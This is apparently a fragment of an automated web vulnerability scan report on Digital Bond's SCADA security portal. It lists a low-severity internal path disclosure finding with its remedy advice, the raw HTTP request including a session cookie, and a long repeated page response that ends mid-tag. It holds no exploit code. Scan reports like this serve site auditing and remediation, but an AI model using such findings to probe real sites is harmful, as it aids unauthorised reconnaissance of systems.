href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Left Sidebar -->
<td id="left">
<div id="text-3" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Bandolier Security Audit File" href="http://digitalbond.com/2011/02/14/bandolier-security-audit-file-for-sisco-iccp-server/">Bandolier Security Audit Files for SISCO ICCP Server</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg" alt="" width="57" height="56" /></a></p><p><a title="ICSJWG" href="http://www.us-cert.gov/control_systems/icsjwg/conference.html">Dale Peterson presenting on USG Funded ICS Security Tools @ ICSJWG</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p></div> </div><div id="flexipages-3" class="widget flexipages_widget"><div class="widget-title"><h3>Pages</h3></div><ul> <li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" title="Consulting">Consulting</a></li> <li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" title="Critical Intelligence">Critical Intelligence</a></li> <li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" title="SCADApedia">SCADApedia</a></li> <li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" title="Tools">Tools</a> <ul> <li class="page_item page-item-5502"><a href="http://www.digitalbond.com/tools/bandolier/" title="Bandolier">Bandolier</a></li> <li class="page_item page-item-5503 current_page_ancestor current_page_parent"><a href="http://www.digitalbond.com/tools/portaledge/" title="Portaledge">Portaledge</a> <ul> <li class="page_item page-item-9450"><a href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/" title="NERC CIP-5 Monitoring Modules">NERC CIP-5 Monitoring Modules</a></li> <li class="page_item page-item-8863"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-and-nerc-cip/" title="Portaledge and NERC CIP">Portaledge and NERC CIP</a></li> <li class="page_item page-item-9483"><a href="http://www.digitalbond.com/tools/portaledge/availability-event-class/" title="Availability Event Class">Availability Event Class</a></li> <li class="page_item page-item-8868"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-enumeration-event-class/" title="Enumeration Event Class">Enumeration Event Class</a></li> <li class="page_item page-item-8875"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" title="Portaledge Event Installation">Portaledge Event Installation</a></li> <li class="page_item page-item-8876"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/" title="Portaledge Event Taxonomy">Portaledge Event Taxonomy</a></li> <li class="page_item page-item-8880 current_page_item"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" title="Portaledge SEM Integration">Portaledge SEM Integration</a></li> </ul></li> <li class="page_item page-item-5504"><a href="http://www.digitalbond.com/tools/quickdraw/" title="Quickdraw SCADA IDS">Quickdraw SCADA IDS</a></li> <li class="page_item page-item-5505"><a href="http://www.digitalbond.com/tools/the-rack/" title="The Rack">The Rack</a></li> <li class="page_item page-item-8994"><a href="http://www.digitalbond.com/tools/scada-honeynet/" title="SCADA Honeynet">SCADA Honeynet</a></li> <li class="page_item page-item-9353"><a href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/" title="ICS Security Tool Mail List">ICS Security Tool Mail List</a></li> </ul></li> <li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" title="About Us">About Us</a></li> <li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" title="Advertise">Advertise</a></li></ul></div>
</td>
<!-- / Left Sidebar -->
<!-- Main Column -->
<td id="middle">
<div class="post-8880 page type-page status-publish hen..
[Possible] Internal Path Leakage (Windows)
[Possible] Internal Path Leakage (Windows)
2
TOTAL
INFORMATION
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.
Remedy
First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
- Error messages should be disabled.
- Remove this kind of sensitive data from the output.
External References
|
- /tools/portaledge/portaledge-event-installation/
/tools/portaledge/portaledge-event-installation/ |
Identified Internal Path(s)
C:\Program Files\PIPC\ACE\ClassLibraries
Request
GET /tools/portaledge/portaledge-event-installation/ HTTP/1.1
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:12 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2j9>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:12 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: 89c98888b0c8285bb23b4133a30873a9
Content-Encoding:
Content-Length: 8000
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Portaledge Event Installation | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Portaledge Event Installation Comments Feed" href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/comment-reply.js?ver=20090102'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='up' title='Portaledge' href='http://www.digitalbond.com/tools/portaledge/' /><link rel='prev' title='Field Device Performance Degradation Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/field-device-performance-degradation-event/' /><link rel='next' title='Portaledge Event Taxonomy' href='http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/' /><link rel='shortlink' href='http://wp.me/P1lryr-2j9' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,420] --><link rel="canonical" href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="page page-id-8875 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=8" title="Industrial Defender"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/BWS6XY_banner_2011.02.22b.gif" alt="Industrial Defender" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Left Sidebar -->
<td id="left">
<div id="text-3" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Bandolier Security Audit File" href="http://digitalbond.com/2011/02/14/bandolier-security-audit-file-for-sisco-iccp-server/">Bandolier Security Audit Files for SISCO ICCP Server</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/2011.jpg" alt="" width="57" height="56" /></a></p><p><a title="ICSJWG" href="http://www.us-cert.gov/control_systems/icsjwg/conference.html">Dale Peterson presenting on USG Funded ICS Security Tools @ ICSJWG</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p></div> </div><div id="flexipages-3" class="widget flexipages_widget"><div class="widget-title"><h3>Pages</h3></div><ul> <li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" title="Consulting">Consulting</a></li> <li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" title="Critical Intelligence">Critical Intelligence</a></li> <li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" title="SCADApedia">SCADApedia</a></li> <li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" title="Tools">Tools</a> <ul> <li class="page_item page-item-5502"><a href="http://www.digitalbond.com/tools/bandolier/" title="Bandolier">Bandolier</a></li> <li class="page_item page-item-5503 current_page_ancestor current_page_parent"><a href="http://www.digitalbond.com/tools/portaledge/" title="Portaledge">Portaledge</a> <ul> <li class="page_item page-item-9450"><a href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/" title="NERC CIP-5 Monitoring Modules">NERC CIP-5 Monitoring Modules</a></li> <li class="page_item page-item-8863"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-and-nerc-cip/" title="Portaledge and NERC CIP">Portaledge and NERC CIP</a></li> <li class="page_item page-item-9483"><a href="http://www.digitalbond.com/tools/portaledge/availability-event-class/" title="Availability Event Class">Availability Event Class</a></li> <li class="page_item page-item-8868"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-enumeration-event-class/" title="Enumeration Event Class">Enumeration Event Class</a></li> <li class="page_item page-item-8875 current_page_item"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" title="Portaledge Event Installation">Portaledge Event Installation</a></li> <li class="page_item page-item-8876"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/" title="Portaledge Event Taxonomy">Portaledge Event Taxonomy</a></li> <li class="page_item page-item-8880"><a href="http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/" title="Portaledge SEM Integration">Portaledge SEM Integration</a></li> </ul></li> <li class="page_item page-item-5504"><a href="http://www.digitalbond.com/tools/quickdraw/" title="Quickdraw SCADA IDS">Quickdraw SCADA IDS</a></li> <li class="page_item page-item-5505"><a href="http://www.digitalbond.com/tools/the-rack/" title="The Rack">The Rack</a></li> <li class="page_item page-item-8994"><a href="http://www.digitalbond.com/tools/scada-honeynet/" title="SCADA Honeynet">SCADA Honeynet</a></li> <li class="page_item page-item-9353"><a href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/" title="ICS Security Tool Mail List">ICS Security Tool Mail List</a></li> </ul></li> <li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" title="About Us">About Us</a></li> <li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" title="Advertise">Advertise</a></li></ul>..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:12 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Link: <http://wp.me/P1lryr-2j9>; rel=shortlink
Last-Modified: Tue, 19 Apr 2011 20:00:12 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: 89c98888b0c8285bb23b4133a30873a9
Content-Encoding:
Content-Length: 8000
X-Type: default
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Portaledge Event Installation | Digital Bond's SCADA Security Portal</title>
<link rel="shortcut icon" href="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="http://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="http://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="http://www.digitalbond.com/comments/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Portaledge Event Installation Comments Feed" href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/feed/" /><link rel="stylesheet" href="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='blackbirdpie-css-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/css/blackbirdpie.css?ver=20110404' type='text/css' media='all' /><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-includes/js/comment-reply.js?ver=20090102'></script><script type='text/javascript' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie/js/blackbirdpie.js?ver=20110404'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='http://www.digitalbond.com/' /><link rel='up' title='Portaledge' href='http://www.digitalbond.com/tools/portaledge/' /><link rel='prev' title='Field Device Performance Degradation Event' href='http://www.digitalbond.com/tools/portaledge/availability-event-class/field-device-performance-degradation-event/' /><link rel='next' title='Portaledge Event Taxonomy' href='http://www.digitalbond.com/tools/portaledge/portaledge-event-taxonomy/' /><link rel='shortlink' href='http://wp.me/P1lryr-2j9' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,420] --><link rel="canonical" href="http://www.digitalbond.com/tools/portaledge/portaledge-event-installation/" /><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('http://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="http://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="page page-id-8875 page-child parent-pageid-5503">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="colone" /><col class="coltwo" />
</colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="http://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501 current_page_ancestor"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="http://www.digitalbond.com/"><img class="logo" src="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" 